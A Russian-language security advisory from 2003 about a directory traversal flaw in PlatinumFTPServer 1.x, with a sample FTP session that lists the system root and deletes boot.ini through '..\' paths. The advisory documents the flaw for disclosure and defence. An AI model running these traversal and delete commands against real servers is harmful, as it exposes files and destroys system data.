Дата публикации: | 04.01.2003 |
Всего просмотров: | 1316 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Отказ в обслуживании Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PlatinumFTPServer 1.x |
Описание: | PlatinumFTP не фильтрует последовательность "..\" в FTP командах, позволяя удаленному пользователю выйти за пределы разрешенных каталогов и читать произвольные файлы на системе. Уязвимость позволяет также удалять произвольные файлы. Пример:
C:\>ftp 192.168.1.199 Connected to 192.168.1.199. 220-PlatinumFTPserver V1.0.6 220-PlatinumFTPserver (C)2002 BYTE/400 LTD 220- 220 Enter login details User (192.168.1.199:(none)): anonymous 331 Password required for anonymous. Password: 230-Send comments to support@PlatinumFTP.com 230-Date 12/30/02, Time 1:44:34 PM. 230 Storage available 1,954,179,072 Bytes. ftp> dir 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Listing complete. ftp> cd .. 550 Access denied ftp> dir ..\..\..\..200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT 226 Listing complete. ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec. ftp> delete ..\..\..\..\boot.ini 250 delete command successful. ftp> dir ..\..\..\..200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT 226 Listing complete. ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec. ftp> cd @/..@/.. ftp> bye 221 Goodbye.Byte/400 PlatinumFTPserver 1.0.6 |
Ссылки: |
Эксплоит Multiple vulnerabilities found in PlatinumFTPserver V1.0.6 |